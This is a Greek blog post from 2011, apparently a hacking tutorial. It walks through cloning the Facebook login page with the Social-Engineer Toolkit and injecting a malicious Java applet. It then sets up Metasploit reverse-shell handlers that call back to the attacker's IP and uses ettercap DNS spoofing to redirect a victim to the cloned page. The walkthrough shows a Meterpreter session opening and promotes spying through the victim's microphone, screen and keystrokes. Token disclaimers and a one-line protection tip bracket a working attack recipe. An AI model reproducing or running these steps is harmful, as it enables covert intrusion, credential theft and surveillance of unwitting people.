ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι


Τετάρτη 21 Δεκεμβρίου 2011

Πως εισβαλω σε ενα υπολογιστη παρα πολυ ευκολα

*ΠΡΟΣΟΧΗ αυτος ο οδηγος ειναι παρανομος αν εφαρμοστει σε τριτα ατομα χωρις να το γνωριζουν. Δεν φερω καμια ευθυνη αν εφαρμοστει κακοβουλα*



Τι θα χρειαστειτε;

1.Backtrack 5 R1

  • ανοιγουμε το SET θα το βρειτε στο Social Engineer Tools 


  • επιλεγουμε 1 - Social-Engineering Attacks
  • 2 - Website Attack Vectors
  • 1 - Java Applet Attack Method
  • 2 - Site Cloner
  • βαζουμε την σελιδα που θελουμε να κλωνοποιησουμε και να τσιμπισει το θυμα πχ το facebook οποτε γραφω www.facebook.com και μας εμφανιζει αυτο 
  • [*] Cloning the website: https://login.facebook.com/login.php
    [*] This could take a little bit...
    [*] Injecting Java Applet attack into the newly cloned website.
    [*] Filename obfuscation complete. Payload name is: jBcXL2pFDSM
    [*] Malicious java applet website prepped for deployment
  • επιλεγουμε 7 - Windows Meterpreter Reverse_TCP X64 (Connect back to the attacker Windows x64), Meterpreter *μπορειτε να διαλεξετε οτι θελετε απλα το 7 δουλευει σε vista και windows 7
  • PORT of the listener [443]: βαζω οτι θελω πχ 4444 η πατατε enter και μπενει η προεπιλεγμενη 443 θυρα
  • και σας  ανοιγει το metasploit ......
  • ***************************************************
    Web Server Launched. Welcome to the SET Web Attack.
    ***************************************************

    [--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--]
    [--] Apache web server is currently in use for performance. [--]
    [-] Launching MSF Listener...
    [-] This may take a few to load MSF...
    [-] ***
    [-] * WARNING: Database support has been disabled
    [-] ***

                              ########                  #
                          #################            #
                       ######################         #
                      #########################      #
                    ############################
                   ##############################
                   ###############################
                  ###############################
                  ##############################
                                  #    ########   #
                     ##        ###        ####   ##
                                          ###   ###
                                        ####   ###
                   ####          ##########   ####
                   #######################   ####
                     ####################   ####
                      ##################  ####
                        ############      ##
                           ########        ###
                          #########        #####
                        ############      ######
                       ########      #########
                         #####       ########
                           ###       #########
                          ######    ############
                         #######################
                         #   #   ###  #   #   ##
                         ########################
                          ##     ##   ##     ##



           =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
    + -- --=[ 775 exploits - 411 auxiliary - 121 post
    + -- --=[ 238 payloads - 27 encoders - 8 nops
           =[ svn r14417 updated 6 days ago (2011.12.15)

    [*] Processing src/program_junk/meta_config for ERB directives.
    resource (src/program_junk/meta_config)> use exploit/multi/handler
    resource (src/program_junk/meta_config)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
    PAYLOAD => windows/x64/meterpreter/reverse_tcp
    resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
    LHOST => 0.0.0.0
    resource (src/program_junk/meta_config)> set LPORT 4444
    LPORT => 4444
    resource (src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (src/program_junk/meta_config)> exploit -j
    [*] Exploit running as background job.
    resource (src/program_junk/meta_config)> use exploit/multi/handler
    resource (src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
    PAYLOAD => osx/x86/shell_reverse_tcp
    resource (src/program_junk/meta_config)> set LHOST 192.168.1.67
    LHOST => 192.168.1.67
    resource (src/program_junk/meta_config)> set LPORT 8080
    LPORT => 8080
    resource (src/program_junk/meta_config)> set InitialAutoRunScript post/osx/gather/enum_osx
    InitialAutoRunScript => post/osx/gather/enum_osx
    resource (src/program_junk/meta_config)> set ExitOnSession false
    [*] Started reverse handler on 0.0.0.0:4444
    [*] Starting the payload handler...
    ExitOnSession => false
    resource (src/program_junk/meta_config)> exploit -j
    [*] Exploit running as background job.
    resource (src/program_junk/meta_config)> use exploit/multi/handler
    resource (src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
    PAYLOAD => linux/x86/shell/reverse_tcp
    resource (src/program_junk/meta_config)> set LHOST 192.168.1.67
    LHOST => 192.168.1.67
    resource (src/program_junk/meta_config)> set LPORT 8081
    LPORT => 8081
    resource (src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (src/program_junk/meta_config)> exploit -j
    [*] Started reverse handler on 192.168.1.67:8080
    [*] Starting the payload handler...
    [*] Exploit running as background job.
    msf  exploit(handler) >
    [*] Started reverse handler on 192.168.1.67:8081
    [*] Starting the payload handler...
  • τωρα το μονο που μενει ειναι να κανουμε το θυμα να ενωθει σε εμας
  • οποτε παμε και ανοιγουμε ενα τερματικο και γραφουμε cd /usr/local/share/ettercap/ και μετα nano etter.dns και γραφουμε *.facebook.*  A 192.168.1.67 * την ip μας δλδ ετσι
  • παταω ctrl+x , y και enter για να το αποθηκευσει
  • μετα ανοιγω το ettercap παταω shift+u Network interface : wlan0
  • ctrl+s και μετα h και προσθετω σαν target 1 το ρουτερ και target 2 το θυμα
  • ctrl+p και επιλεγω dns_spoof
  • ctrl+w και περιμενω να δω αυτο
  • [*] Sending stage (946176 bytes) to 192.168.1.73
    [*] Meterpreter session 1 opened (192.168.1.67:4444 -> 192.168.1.73:63608) at 2011-12-21 17:29:06 +0200
  • παταω enter και γραφω sessions -i 1 * σταματαω το mitm attack του ettercap και το κλεινω
  • και ειμαστε ετοιμοι.... εχουμε εισβαλει *αν γραψουμε help θα μας εμφανισει εντολες που μπορουμε να γραψουμε οπως να ακουω απο το μικροφωνο του θυματος να βλεπω την επιφανεια εργασιας του,να γραφω τα πληκτρα που παταει κτλ
  • Το θυμα μας οταν παει να μπει στο facebook  θα του εμφανιστει αυτο

  •  θα πατησει run και θα μας ''ανοιξει την πορτα να εισβαλουμε'' χωρις να καταλαβει τι εγινε .....απλα μετα πατηστε στο ettercap stop mitm attack για να μην κινησεις υποψια.

Πως θα προστατευτειτε;
1.Γενικα να προσεχετε σε ποιες σελιδες κανετε εγκατασταση java και επισεις να κοιτατε τον δημιουργο αν λεει uknown και from γραφει ip τοτε μην πατατε run

Δεν υπάρχουν σχόλια: